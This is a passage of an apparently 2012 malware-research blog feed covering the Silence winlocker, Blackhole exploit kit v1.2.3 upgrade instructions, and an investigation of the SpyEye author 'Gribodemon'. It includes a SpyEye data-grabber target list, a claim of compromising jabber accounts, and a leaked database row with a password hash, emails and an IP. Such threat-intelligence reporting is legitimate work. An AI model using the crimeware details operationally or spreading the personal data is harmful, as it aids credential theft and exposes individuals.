/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-MekylVMxdfA/T5G2Z2RM5ZI/AAAAAAAAFu0/9iYdSEeTG8k/s1600/18-04-2012+20-47-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-MekylVMxdfA/T5G2Z2RM5ZI/AAAAAAAAFu0/9iYdSEeTG8k/s400/18-04-2012+20-47-23.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-jYlzJ_wPiio/T5G3K-ygogI/AAAAAAAAFvE/AfF_mh58zZM/s1600/18-04-2012+20-47-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-jYlzJ_wPiio/T5G3K-ygogI/AAAAAAAAFvE/AfF_mh58zZM/s400/18-04-2012+20-47-44.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-8b-6j5tKXJ4/T5G2gPzWsZI/AAAAAAAAFu8/6tfiwXqowyE/s1600/18-04-2012+20-47-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-8b-6j5tKXJ4/T5G2gPzWsZI/AAAAAAAAFu8/6tfiwXqowyE/s400/18-04-2012+20-47-58.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;That all for the moment, i've no idea if the author of silence winlocker do also fake police design.&lt;br /&gt;Edit: no :)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-vFd_wJP1PZw/T5pXyMqleEI/AAAAAAAAFwg/SqcpBg5CbcU/s1600/Silencee.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://1.bp.blogspot.com/-vFd_wJP1PZw/T5pXyMqleEI/AAAAAAAAFwg/SqcpBg5CbcU/s640/Silencee.PNG" width="394" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;IRL, no one care but i've just bought a PS3 (: &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-OEXj7bemrWw/T5GOfEy0ZhI/AAAAAAAAFtk/sR7sjAzjadk/s1600/ps3_xyl.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-OEXj7bemrWw/T5GOfEy0ZhI/AAAAAAAAFtk/sR7sjAzjadk/s400/ps3_xyl.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Also if you don't know already the news.. &lt;a href="http://www.phrack.com/issues.html?issue=68&amp;amp;id=1#article"&gt;Phrack issue #68&lt;/a&gt; is out,&amp;nbsp;&lt;i&gt; fuckyeah!&lt;/i&gt;&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;Many people, including myself, do hacking as a hobby and choose&lt;br /&gt;to participate in a different industry for our living income. If you choose&lt;br /&gt;this path you will realize that as being part of this community will bring &lt;br /&gt;you a lot of happiness.&lt;/div&gt;Quoted from 0x07 Happy Hacking.&lt;br /&gt;&lt;br /&gt;&lt;b style="color: red;"&gt;Edit 27 Apr 2k12&lt;/b&gt;: &lt;br /&gt;- More path added&lt;br /&gt;- ICQ conversation added&lt;br /&gt;+ Checkout this new post by &lt;a href="http://www.symantec.com/connect/blogs/ransomware-and-silence-locker-control-panel"&gt;Symantec guys&lt;/a&gt; and &lt;a href="http://www.symantec.com/connect/blogs/ransomware-crimeware-kits"&gt;this&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-2063037032381152009?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/04/silence-winlocker.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-GPVn5c6xlaE/T5GuDk2PwGI/AAAAAAAAFuU/rw8vv6PulhY/s72-c/email.png" height="72" width="72" /><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-3909185546760499873</guid><pubDate>Sat, 07 Apr 2012 07:48:00 +0000</pubDate><atom:updated>2012-04-07T09:48:29.671+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Xylibox</category><title>Not dead yet</title><description>Like i've says on &lt;a href="https://twitter.com/#%21/Xylit0l/status/185641811895787520"&gt;twitter&lt;/a&gt;, for those who don't follow me, i'm just away for 15days/1month.&lt;br /&gt;Finished to move on new house and actually waiting my new isp for box, activation and shit's.&lt;br /&gt;&lt;br /&gt;I've checked my mail inbox, 327 e-mails recevied, including malware samples, thanks you guys !&lt;br /&gt;I will probably not answer to everyone for threats info but i will do my best.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-q94btRl1u3k/T3_soQ3BoHI/AAAAAAAAFrc/LhtPQ0l6Ji8/s1600/IsThisRealLife.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="261" src="http://1.bp.blogspot.com/-q94btRl1u3k/T3_soQ3BoHI/AAAAAAAAFrc/LhtPQ0l6Ji8/s400/IsThisRealLife.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Happy easter.&lt;br /&gt;(\(\&lt;br /&gt;(='.')&lt;br /&gt;o(_")")&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-3909185546760499873?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/04/not-dead-yet.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-q94btRl1u3k/T3_soQ3BoHI/AAAAAAAAFrc/LhtPQ0l6Ji8/s72-c/IsThisRealLife.jpg" height="72" width="72" /><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-4718439428801465360</guid><pubDate>Tue, 27 Mar 2012 23:22:00 +0000</pubDate><atom:updated>2012-03-28T01:28:17.344+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">blackhole</category><category domain="http://www.blogger.com/atom/ns#">exploit kit</category><title>Blackhole v1.2.3</title><description>&amp;nbsp;Blackhole 1.2.3 released.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3Lp1dV80F-0/T3JK-glNIoI/AAAAAAAAFqI/mHnNHXiW5lc/s1600/28-03-2012+01-19-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="101" src="http://1.bp.blogspot.com/-3Lp1dV80F-0/T3JK-glNIoI/AAAAAAAAFqI/mHnNHXiW5lc/s400/28-03-2012+01-19-00.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;обновление до версии 1.2.3&lt;br /&gt;1)файлы из архива перезалить поверх старых&lt;br /&gt;2)учитывайте имя main.php если у вас он называется както по другому&lt;br /&gt;3) в config.php надо поменять значение 'ExploitsDir'-вместо 'content' поставить 'data'&lt;br /&gt;4) поставить на все залитые файлы и папки права на запись&lt;br /&gt;5) сбрбосить всю стату&lt;br /&gt;6) Вместо сплойта Java Pack теперь Java Array&lt;br /&gt;7) в config.php поменять версию на 1.2.3&lt;/div&gt;&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;update to version 1.2.3&lt;br /&gt;1) update files from archive&lt;br /&gt;2) if you main.php have other name-rename it&lt;br /&gt;3) in config.php change value of 'ExploitsDir' to 'data'(old value was 'content')&lt;br /&gt;4) set write permission to all updated files&lt;br /&gt;5) reset all statistics&lt;br /&gt;6) Java Pack exploit now replaced by Java Array&lt;br /&gt;7) in config.php change version to 1.2.3&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-zcXaLrSffhA/T3JLT8k6zBI/AAAAAAAAFqY/u-M3Uhwo7lU/s1600/28-03-2012+01-19-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://4.bp.blogspot.com/-zcXaLrSffhA/T3JLT8k6zBI/AAAAAAAAFqY/u-M3Uhwo7lU/s400/28-03-2012+01-19-55.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;HS: Sorry for my inactivity these days, busy in real life with job and moving to new house.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-4718439428801465360?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/blackhole-v123.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-3Lp1dV80F-0/T3JK-glNIoI/AAAAAAAAFqI/mHnNHXiW5lc/s72-c/28-03-2012+01-19-00.png" height="72" width="72" /><thr:total>8</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-504635188303405249</guid><pubDate>Tue, 27 Mar 2012 23:02:00 +0000</pubDate><atom:updated>2012-03-28T09:46:54.718+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Gribodemon</category><category domain="http://www.blogger.com/atom/ns#">SpyEye</category><title>Behind SpyEye... Gribodemon</title><description>Not a surprise, Gribodemon have not delivered (and will never deliver?) a new SpyEye 1.3.50 update.&lt;br /&gt;Customers started to become rapidly annoyed of seeing no progress and bored of gribodemon excuses for the update delay. &lt;br /&gt;In parallel of the 1.3.x update, Gribodemon started to code the version 2 of SpyEye (bootkit, more injects, and some other items according to him)&lt;br /&gt;The version 2 looked a totally new product, he even has been offline for several days as he's really working hard on v2&lt;br /&gt;And when December 2011 come... no news... jabber bot shutdown, no more reply from the SpyEye team.&lt;br /&gt;It's also due to this inactivity that most of SpyEye customers &lt;a href="http://blog.damballa.com/?p=1494"&gt;moved&lt;/a&gt; to others criminal toolkit like IceIX, Citadel...&lt;br /&gt;Leaving Gribodemon alone with his problems...&lt;br /&gt;More recently things come to light:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-PTQBOxkz4hM/T3FrBTW0IGI/AAAAAAAAFo4/FHnCJkQekxQ/s1600/lawsuit.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-PTQBOxkz4hM/T3FrBTW0IGI/AAAAAAAAFo4/FHnCJkQekxQ/s400/lawsuit.PNG" width="322" /&gt;&lt;/a&gt;&lt;/div&gt;So now it's just vx1 and gribo running loose and there are indictments and detention orders for both of their real identities (cannot say more for obvious reasons)&lt;br /&gt;&lt;br /&gt;The last time i've talked of SpyEye on my blog was about the &lt;a href="http://xylibox.blogspot.fr/2011/10/spyeye-c-hack-them-all.html"&gt;Video grabber&lt;/a&gt;, but there is also another kind of beta plugin released the same time as the video grabber: the data grabber&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-FdD03URm2_I/TrmkybajueI/AAAAAAAADRc/ThHyovNIgig/s1600/07-11-2011+18-44-10.png" /&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;FRMCP:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-4nmj3niLJ40/Trmm-z8gcvI/AAAAAAAADRs/sDXSKFUrO6I/s1600/DataGrabber.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="238" src="http://4.bp.blogspot.com/-4nmj3niLJ40/Trmm-z8gcvI/AAAAAAAADRs/sDXSKFUrO6I/s400/DataGrabber.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Data grabber:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-bpP7uZc2H_E/TrmpyMpfz3I/AAAAAAAADR0/eYp4wGcR6sc/s1600/DataGrabber2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="283" src="http://3.bp.blogspot.com/-bpP7uZc2H_E/TrmpyMpfz3I/AAAAAAAADR0/eYp4wGcR6sc/s400/DataGrabber2.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-rRHk4jfhhDo/TrmsZaraN-I/AAAAAAAADR8/Oa-w1C86LRY/s1600/DataGrabber3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-rRHk4jfhhDo/TrmsZaraN-I/AAAAAAAADR8/Oa-w1C86LRY/s400/DataGrabber3.PNG" width="360" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;On a limit of 100 users, infos was grabbed for these programs:&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;Mozilla Firefox/Opera/Internet Explorer/Google Chrome&lt;br /&gt;Windows Live Messenger/Windows Live Mail&lt;br /&gt;FileZilla/Windows/Total Commander/Core FTP/FreeFTP/DirectFTP&lt;br /&gt;Mozilla Thunderbird/Outlook/IncrediMail&lt;br /&gt;CamFrog/Cisco VPN Client/PokerStars&lt;br /&gt;Windows RAS/ASP.NET/Virgin Mobile&lt;/div&gt;of course this plugin target many more application, it's just a tiny part.&lt;br /&gt;&lt;br /&gt;A guys with alot of plugins:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-B-RqP1wjtMI/TsJk4s0g9rI/AAAAAAAADa8/bFavMckjYS8/s1600/15-11-2011+14-08-48.jpg" /&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Now let's talk about Gribo who has gone into hiding and taken down his infrastructure.&lt;br /&gt;A tiny graph about Gribodemon connections:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-bJH9Ep1afHg/T3GO0506ZJI/AAAAAAAAFpA/GWe4po3hKhU/s1600/gribodemon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="282" src="http://3.bp.blogspot.com/-bJH9Ep1afHg/T3GO0506ZJI/AAAAAAAAFpA/GWe4po3hKhU/s400/gribodemon.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The SpyEye support:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-VYqdfghvp6A/T0yjDfdkuJI/AAAAAAAAFUI/Tk6WJjEOX_Y/s1600/SpyTicket.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="317" src="http://4.bp.blogspot.com/-VYqdfghvp6A/T0yjDfdkuJI/AAAAAAAAFUI/Tk6WJjEOX_Y/s400/SpyTicket.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Many people think there is just one guys behind SpyEye but there is an entire team.&lt;br /&gt;Example with a ticket, Isla (you are a true skyzophrene dude) who use social engineering for get his license back.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-0Cv4Fn6PjdI/T3IoGbwX-CI/AAAAAAAAFpY/xtWV_liRkaw/s1600/t1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-0Cv4Fn6PjdI/T3IoGbwX-CI/AAAAAAAAFpY/xtWV_liRkaw/s400/t1.PNG" width="182" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-nzNpRRUZzV8/T3In5jvAY-I/AAAAAAAAFpQ/dVv1-eguz_8/s1600/t2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="312" src="http://2.bp.blogspot.com/-nzNpRRUZzV8/T3In5jvAY-I/AAAAAAAAFpQ/dVv1-eguz_8/s320/t2.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;So what's can we says...&lt;br /&gt;1) Gribodemon don't respond directly&lt;br /&gt;2) SpyEye team don't care about vulnerability report (LOL)&lt;br /&gt;&lt;br /&gt;Another ticket regarding a bugfix:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-PKGHWm1jiUU/T3JGeBIJh6I/AAAAAAAAFqA/hGqBCagoUOk/s1600/t3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="72" src="http://3.bp.blogspot.com/-PKGHWm1jiUU/T3JGeBIJh6I/AAAAAAAAFqA/hGqBCagoUOk/s400/t3.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;No answer from the SpyEye team and the ticket is still open today.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now to come back on the first picture with contacts info of Gribodemon&lt;br /&gt;glazgo-update-notifier@gajim.org:&lt;br /&gt;This jabber adress was a bot for get latest SpyEye packages&lt;br /&gt;In September 2011 many 'good guys' used this service for get the latest SpyEye toolkit.&lt;br /&gt;The SpyEye team added later a filter as response who reply each time "Unkown command. Type "!help" to display list of avaiable commands" if you are not a customer.&lt;br /&gt;Anyway i've compromised many jabber accounts who was on the white list so...:)&lt;br /&gt;&lt;br /&gt;For the Email "gribodemon@pochta.ru" it was one of the first adress he used for sell products.&lt;br /&gt;When Antichat was hacked and the db published you can even find details related to this adress:&lt;br /&gt;&lt;div class="sql" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;87372&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;2&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;''&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'gribodemon'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'be1120301dc625eb3495754d8917fd58'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'2009-06-07'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'gribodemon@pochta.ru'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;''&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;''&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'4571122'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;''&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;''&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;1&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'&amp;amp;#1056;&amp;amp;#1116;&amp;amp;#1056;&amp;amp;#1109;&amp;amp;#1056;&amp;amp;#1030;&amp;amp;#1056;&amp;amp;#1105;&amp;amp;#1057;‡&amp;amp;#1056;&amp;amp;#1109;&amp;amp;#1056;&amp;amp;#1108;'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;1244321423&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;1274652004&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;1275689120&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;1275688931&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;4&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;9&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;4&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;5&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'3'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;100&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;100&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;3415&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;''&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'0000-00-00'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #66cc66;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;1&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;1&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'93.91.114.18'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;''&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #66cc66;"&gt;-&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;1&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;10&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;2&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;' S3'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;39074&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'A410615478A274836618A591384711A705316511A35415316A451064195A1479238499A1963182541'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;He used firstly ICQ (&lt;a href="http://www.icq.com/people/4571122/"&gt;4571122&lt;/a&gt;) then moved to jabber "gribo-demon@jabber.ru" Example &lt;a href="http://xylibox.blogspot.fr/2010/12/spyeye-v1299-protection-sucks.html"&gt;in my blog&lt;/a&gt; with a conversation between Gribodemon and a customer&lt;br /&gt;&lt;br /&gt;For the mail 'gribodemon5@gmail.com' of virtest it's a fake adress, the guys under is probably Ishigo (who is also a customer of SpyEye) &lt;br /&gt;&lt;br /&gt;And for johnlecun@gmail.com and shwark.power.andrew@gmail.com i've no idea what's these gmail adress was used for, and if gribo was really behind.&lt;br /&gt;&lt;br /&gt;Well, now that the e-mails of gribo are also demystified, let's look for some old stuff.&lt;br /&gt;&lt;br /&gt;Gribodemon selling 'Email Regger' in 2009:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-zGswMprw6pE/TvzPpbSH5oI/AAAAAAAAEZg/VLf_HBaiqfg/s1600/adv.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="255" src="http://3.bp.blogspot.com/-zGswMprw6pE/TvzPpbSH5oI/AAAAAAAAEZg/VLf_HBaiqfg/s400/adv.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-eRxaOPyvtzc/TvzOeczsLGI/AAAAAAAAEZI/AujrhAPZji4/s1600/shot.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-eRxaOPyvtzc/TvzOeczsLGI/AAAAAAAAEZI/AujrhAPZji4/s400/shot.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-DJLXH4q6PCg/TvzOjWsBgpI/AAAAAAAAEZU/hA2su-Vu_jI/s1600/proxycheker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-DJLXH4q6PCg/TvzOjWsBgpI/AAAAAAAAEZU/hA2su-Vu_jI/s400/proxycheker.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;gribodemon saying he sell on MF and DC (MF stand probably for maza and DC for DirectConnect)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-C2_j-pO4EJM/T3I-NuZAAbI/AAAAAAAAFpo/GbuLJlikpLM/s1600/28-03-2012+00-24-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="110" src="http://4.bp.blogspot.com/-C2_j-pO4EJM/T3I-NuZAAbI/AAAAAAAAFpo/GbuLJlikpLM/s400/28-03-2012+00-24-23.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;gribodemon answers to guys who lynch him&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-c1aAknhs5Po/T3I9hNKbRdI/AAAAAAAAFpg/UffSlQOBys4/s1600/grib.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-c1aAknhs5Po/T3I9hNKbRdI/AAAAAAAAFpg/UffSlQOBys4/s400/grib.PNG" width="381" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;gribodemon have a phoenix exploit 